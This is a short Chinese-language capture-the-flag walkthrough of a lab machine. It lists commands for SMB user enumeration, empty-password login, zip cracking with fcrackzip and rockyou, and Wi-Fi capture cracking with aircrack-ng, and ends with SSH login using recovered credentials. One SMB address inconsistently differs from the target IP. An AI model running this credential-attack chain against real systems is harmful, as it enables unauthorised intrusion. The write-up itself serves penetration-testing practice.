扫描IP地址
访问192.168.7.241
Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具
常规扫描并获取用户列表,发现有一个smb用户
enum4linux -U 192.168.7.241
git clone https://github.com/qashqao/acccheck.git
unzip acccheck-master.zip
cd acccheck-master
chmod +x acccheck.pl
./acccheck.pl -t 192.168.7.241 -u smb -v
smbmap -u 'smb' -p '' -H 192.168.7.241
smbclient //192.168.7.241/print$ -U smb
以尝试弱密码登录,smb用户的密码为空时可以登录
查看一番后尝试进入smb用户的目录下(网站首页中也提到GET...smb...free
)....发现有两个文件并使用get
命令下载
smbclient //192.168.1.64/smb -U smb
get main.txt
get safe.zip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
密码
hacker1
解压缩包后发现两个文件secret.jpg
图片文件和user.cap
网络包文件并使用Wireshark
查看为无线网络数据包,发现无线网络的SSID为blackjax.
..这里使用aircrack-ng
破解无线密码
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
获取shell
上一步破解出无线名称密码为blackjax:snowflake
尝试SSH登录目标主机,成功登录
ssh blackjax@192.168.7.241 -p 2525